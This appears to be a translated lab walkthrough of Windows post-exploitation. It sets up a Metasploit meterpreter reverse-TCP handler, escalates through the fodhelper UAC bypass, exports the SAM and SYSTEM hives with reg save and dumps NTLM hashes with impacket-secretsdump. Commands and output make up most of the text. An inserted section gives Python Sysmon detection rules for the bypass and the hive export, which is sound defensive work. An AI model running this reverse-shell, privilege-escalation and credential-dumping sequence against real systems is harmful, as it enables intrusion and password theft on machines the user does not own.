use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <lhost>
set LPORT <lport>
exploit
We can try to run hashdump, but since we do not have privileged access it will not work.
meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
Let us try an administrative action, for example saving the SAM directly from the registry (hklm = HKEY_LOCAL_MACHINE).
C:\>reg save hklm\sam arqSam
ERROR: Access is denied.
Access is denied, so we need to escalate to an administrative privilege for this to be possible.
So let us look for modules that bypass UAC (User Account Control). To do that we can background the session without killing it.
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > sessions
Active sessions
===============

  Id  Name  Type                     Information                              Connection
  --  ----  ----                     -----------                              ----------
  1         meterpreter x64/windows  DESKTOP-MJHCOMS\trzwo @ DESKTOP-MJHCOMS  192.168.2.134:666 -> 192.168.2.137:61248 (192.168.2.137)
msf6 exploit(multi/handler) > search uac
msf6 exploit(windows/local/ask) > use exploit/windows/local/bypassuac_fodhelper
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac_fodhelper) > show options
Module options (exploit/windows/local/bypassuac_fodhelper):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.2.134    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows x86
msf6 exploit(windows/local/bypassuac_fodhelper) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/bypassuac_fodhelper) > show targets
Exploit targets:

   Id  Name
   --  ----
   0   Windows x86
   1   Windows x64
msf6 exploit(windows/local/bypassuac_fodhelper) > set target 1
target => 1
msf6 exploit(windows/local/bypassuac_fodhelper) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac_fodhelper) > exploit
With that we bypass UAC and can obtain the files.
meterpreter > shell
Process 2424 created.
Channel 1 created.
Microsoft Windows [versão 10.0.19043.1083]
(c) Microsoft Corporation. Todos os direitos reservados.
C:\Windows\system32>cd \
cd \
C:\>reg save hklm\sam sam1
reg save hklm\sam sam1
A operação foi concluída com êxito.
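From the defender's side, the two steps just shown (the fodhelper UAC bypass and the `reg save hklm\sam` hive export) both leave well-known telemetry. The following detection logic is an added example and not part of the original walkthrough or of Metasploit; it runs over a handful of constructed Sysmon-style events (process creation, EventID 1, and registry value set, EventID 13) and flags the ms-settings handler key that the fodhelper bypass hijacks (MITRE ATT&CK T1548.002), any child process spawned by fodhelper.exe, and `reg save` of the SAM, SYSTEM or SECURITY hive (T1003.002). The event field names follow Sysmon's naming; the sample events themselves are constructed for this example.

```python
import re

# Registry path the fodhelper UAC bypass hijacks (lives under HKCU; Sysmon logs it
# as HKU\<SID>\...). Publicly documented under MITRE ATT&CK T1548.002.
MS_SETTINGS_KEY = "\\software\\classes\\ms-settings\\shell\\open\\command"

# "reg save" of a credential-bearing hive (MITRE ATT&CK T1003.002).
SAM_EXPORT = re.compile(
    r"\breg(?:\.exe)?\s+save\s+(?:hklm|hkey_local_machine)\\(?:sam|system|security)\b",
    re.IGNORECASE,
)

# Constructed Sysmon-style events for this example (not taken from the page).
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": "C:\\Windows\\System32\\reg.exe",
     "TargetObject": "HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Classes\\ms-settings\\Shell\\Open\\command\\DelegateExecute",
     "Details": "(Empty)"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Windows\\System32\\fodhelper.exe",
     "CommandLine": "cmd.exe", "IntegrityLevel": "High"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\reg.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "reg save hklm\\sam sam1", "IntegrityLevel": "High"},
    # Benign noise: a user-level registry query and a normal fodhelper launch.
    {"EventID": 1, "Image": "C:\\Windows\\System32\\reg.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "reg query HKCU\\Software", "IntegrityLevel": "Medium"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\fodhelper.exe",
     "ParentImage": "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe",
     "CommandLine": "fodhelper.exe", "IntegrityLevel": "High"},
]


def detect(events):
    """Return (rule_name, event_index) pairs for every event that matches a rule."""
    findings = []
    for i, ev in enumerate(events):
        eid = ev.get("EventID")
        if eid == 13 and MS_SETTINGS_KEY in ev.get("TargetObject", "").lower():
            findings.append(("T1548.002 ms-settings shell handler hijack", i))
        if eid == 1:
            parent = ev.get("ParentImage", "").lower()
            # fodhelper.exe auto-elevates and normally spawns nothing, so any
            # child process it creates is worth an alert.
            if parent.endswith("\\fodhelper.exe"):
                findings.append(("T1548.002 fodhelper.exe spawned a child process", i))
            if SAM_EXPORT.search(ev.get("CommandLine", "")):
                findings.append(("T1003.002 SAM/SYSTEM/SECURITY hive export via reg save", i))
    return findings


if __name__ == "__main__":
    for rule, idx in detect(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        print(f"[{rule}] event {idx}: {ev.get('Image')} {ev.get('CommandLine', ev.get('TargetObject', ''))}")
```

The two benign events at the end show the intended precision: `reg query` does not trip the hive-export rule, and fodhelper.exe being launched by Settings is normal; only a process that fodhelper itself spawns is flagged. Enabling Sysmon registry auditing for the ms-settings key, or the equivalent SACL with Windows event 4657, is what makes the first rule possible in practice.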
With the two files, SAM and SYSTEM, we obtain the hashes using impacket-secretsdump.
┌──(user㉿kali)-[~/Desktop]
└─$ impacket-secretsdump -sam sam1 -system system1 LOCAL
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0xd34a2958235bcb73bb29ba99ea85df58
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Convidado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:91831139e883c482ff011cf6801468dc:::
trzwo:1001:aad3b435b51404eeaad3b435b51404ee:4469eae41ee734606dc5321bae42c5f3:::
[*] Cleaning up...
The same result is obtained with meterpreter's hashdump as well.